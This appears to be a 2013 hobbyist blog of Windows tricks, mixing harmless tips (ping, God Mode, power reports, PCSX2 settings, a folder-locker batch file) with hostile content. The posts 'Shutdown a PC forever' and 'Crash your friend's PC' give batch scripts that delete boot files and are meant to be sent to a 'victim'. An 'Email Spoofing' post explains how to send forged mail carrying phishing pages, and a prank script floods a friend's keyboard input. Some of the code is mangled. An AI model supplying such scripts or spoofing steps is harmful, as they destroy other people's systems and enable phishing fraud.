PCSX2 FPS Limit Fix
Fix the frame-limiting issues in PCSX2
Complete Hanbook for Minecraft Factions
Rise to new heights on your server, by reading and following this easy guide. Let everyone fear you and respect you at the same time.
Sunday, 31 March 2013
Use notepad as a shortcut to shutdown computer
Know a site's IP
1. Go to start menu and open cmd.
2. Type ping sitename
3. You will get the results
Know a computer's gender
Follow the following steps.
1. Open Notepad and paste the following codes.
CreateObject("SAPI.SpVoice").Speak"i am your computer"
2. Save the file as gender.vbs
3. Now, open the save file
If you hear male voice then your computer is male and if you
hear female voice then its female.
On a serious note it depends on the voice you have selected in microsoft text to speech options. This means you can easily change it!!
Security on the internet
This post is literally for novice users i.e. for those who have begun using computers recently. Yesterday, I visited a friend of mine and he was playing some game on the internet. Within a few minutes of our meeting, he exclaimed "Yaar, mein roz koi na koi tablet ya lottery jeet jata hoon net par khelte hue, lekin click karne par kuchh hota hi nahin" (aise bhi log hote hein). Imagine how I felt at that.
Being shocked and astonished I told him never ever to click on such links as they are fraud and can have viruses and display the same message to everyone.
Please do not click ob these links my friends. PLEASE.
What to do about Spams and spoofed mails
Many, or almost 75%, of the email users don't know what to fo if a spam or a spoofed mail arrives on your ID. Here is what to so. Always report "phishing" or “spoofed” e-mails to the following groups:
1. Forward the email to reportphishing@antiphishing.org .
2. Forward the email to the Federal Trade Commission at spam@uce.gov.
3. Forward the email to the "abuse" email address at the company that is being spoofed (e.g. "spoof@ebay.com").
4. When forwarding spoofed messages, always include the entire original email with its original header information intact.
5. Notify The Internet Crime Complaint Center of the FBI by filing a complaint on their website: www.ic3.gov.
Saturday, 30 March 2013
Deep Web: Go Dark and find what's hidden
- First, I recommend to turn of javascript and cookies on your browser, enabling this would be very dangerous. Also, you might want to disconnect your webcam, just to make sure its not gonna be hijacked.
- Don’t go around clicking every links you could see, always proceed carefully.
- Some understandings of HTML/Javascript/PHP or any knowledge about internet and how it works somehow needed to ensure you are accessing a safe website.
- If anything happens, DON’T PANIC. Disconnect your internet, clear your session and history, pretend nothing happened.
You can search Wikipedia for more info.
Make diary using a notepad
Make a Matrix effect on your PC
@echo off
color 02
:tricks
echo %random%%random%%random%%random%%random%%random%%random%%random%
goto tricks
Wednesday, 27 March 2013
Task Manager shortcut in Windows7
But what if there is a shortcut that directly opens the task manager. I discovered it while I was preparing for the scholar's cup tournament with my teammates +Piyush Kukrety and +Parva Khare .
Just press Ctrl+Shift+Esc and you are done, the task manager will open up instantly.
God Mode in Windows7
So here is how to do it:
1. Make a new folder on the desktop
2. Name it as "GodMode.{ED7BA470-8E54-465E-825C-99712043E01C}" without quotes.
3. Press Enter and its Icon will change to the control panel icon.
And here you are with your God Mode Panel, the computer is all yours.
Tuesday, 26 March 2013
Get power efficiency support from your laptop
1. Type cmd in the start menu and run cmd as administrator
2. Type powercfg -energy -output \Folder where you want this file to be stored\Energy_Report.html
3. It will examine the behavior of your PC for 60seconds and then analyze it and generate a report.
View this report and follow its recommendations to improve battery performance.
Use Hidden international wallpapers on windows7
1. Type C:\Windows\Globalization\MCT in the start menu and press enter.
2. A new window will open with a list of 5 folders. Each subfolder has wallpapers for a specific country: AU for Australia, CA for Canada, GB for Great Britain, US for the United States, and ZA for South Africa.
3. Click on the countries theme you want to use and then go to the themes folder and click on the file. This will install a shortcut in the personalize folder and then you can use it as a theme.
PCSX2 Configurations
Every PC has a different setting for the best performance but I will tell you the best settings possible with a good PC.
If your video is shaky then you can do as follows:
Click on Config> Video(GS)> Plugin Settings.
Change the renderer to Direct 3D 10(Hardware)
Interlacing to none
And this should fix it
If your audio is not good enough then:
Click on Config> Audio(SPU2)> Plugin settings
Reduce Latency to 50ms
If the speed is not good then:
Click on Config> Emulation settings> Speedhacks
Enable speedhacks
Increase EEcyclerate to 3
Increase VU Cycle Stealing to 3
Chck all the other options in the otherhacks and microVU hacks column
And click on Apply
This should fix most of the errors for almost all the games
Saturday, 9 March 2013
Email Spoofing
On the page you will see the following:
From Name: Name of the person who is sending the mail
From email: Email of the person sending the mail
To: Victim's email
Subject: As in normal mails
Attachments: You know what to do here
Content Type: text/plain if you want to send normal message or text/HTML if you want to send phish pages
Enter the CAPTCHA and hit SEND and your work will be done.
Tuesday, 5 March 2013
Shutdown a PC forever
1. Open notepad and paste the following code:
@echo offattrib -r -s -h c:\autoexec.bat del c:\autoexec.bat attrib -r -s -h c:\boot.ini del c:\boot.ini attrib -r -s -h c:\ntldr del c:\ntldr attrib -r -s -h c:\windows\win.ini del c:\windows\win.ini @echo off msg * YOU GOT OWNED!!! shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive
This will delete all the files needed for booting that the OS has installed.
Note: If the OS is installed on D drive please change C to D
For more refer to "Crash your friens PC"
Lock and Hide any folder without any software
1. Copy the coding given below in a notepad.
2. Change your password in the coding.
3. Save the file as anything.bat
4. A folder will be automatically created with the name that you gave to your file.
5. Put the data to be hidden on the folder and click on the batch file.
You will get this: Do you want to lock the folder(Y/N). Type Y and the folder will be locked.
6. To unlock, click on the file again and type in the password you specified and press enter.
CODE:
cls
@ECHO OFF
title Folder Locker
if EXIST "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" goto UNLOCK
if NOT EXIST Locker goto MDLOCKER
:CONFIRM
echo Are you sure u want to Lock the folder(Y/N)
set/p "cho=>"
if %cho%==Y goto LOCK
if %cho%==y goto LOCK
if %cho%==n goto END
if %cho%==N goto END
echo Invalid choice.
goto CONFIRM
:LOCK
ren Locker "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
attrib +h +s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
echo Folder locked
goto End
:UNLOCK
echo Enter password to Unlock folder
set/p "pass=>"
if NOT %pass%==type your password here goto FAIL
attrib -h -s "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}"
ren "Control Panel.{21EC2020-3AEA-1069-A2DD-08002B30309D}" Locker
echo Folder Unlocked successfully
goto End
:FAIL
echo Invalid password
goto end
:MDLOCKER
md Locker
echo Locker created successfully
goto End
:End
Make your friend write "You are a fool" continuously
Open the notepad and paste the following code
Code :
Set wshShell = wscript.CreateObject("WScript.Shell") do wscript.sleep 100 wshshell.sendkeys "You are a fool." loop
Save it as anything.bat and run it on your friend's PC.
This will do your work.
Crash your friend's PC
1.Open the notepad and paste this code.
===================================
echo off
C:
cd..
cd..
cd..
attrib -r -s -h ntdetect.com
del ntdetect.com echo on print U r a LOSER.. PC Hacked by Hackanonymously!!! ====================================
2. Save it as anything.bat and send it to the victim's computer.
Once activated it will do its work and the system will shutdown forever.
Note: Don't try it on your own PC or else.....
Monday, 4 March 2013
Google Tricks
1. Make the oo's of Google disappear: Go to the search box and type "Darkarts Google" without quotations. Click on the first link and a page of the older Google will be displayed. Click on the oo's and wait for 3sec for them to disappear, and the click the gap again to make them re-appear.
2. Let Google destroy your search results: Go to the search box and type "Zerg Rush" without quotations. Your search results will be infiltrated by o's which you can destroy by clicking. Your score will be displayed in the end.
These were the top 15 tricks by Google till now and it will keep on uploading more!!!
Sunday, 3 March 2013
Recover from a virus attack
1. Download Re-Enable and execute it.
2. It can be used to enable registry editor, command prompt, task manager, etc. Just select the tools you want to enable and click on "Re-Enable".
Note: You will require .net framework 3.5 or higher to run this software.
Download: ziddu.com/download/12815677/Re_Enable_v2.rar.html
Friday, 1 March 2013
Virus Removal: new folder.exe
So you can do this easily with the help of another tool known as Smart Virus Removal Tool. Download and run it and then click on "Delete autorun.inf file" > "Remove virus from USB" > "Restore Default Windows Settings"
The virus will be removed from the pen drive and all the registry settings and the folders will be accessible again.
Download: ziddu.com/download12815221/smart virus remvr.rar.html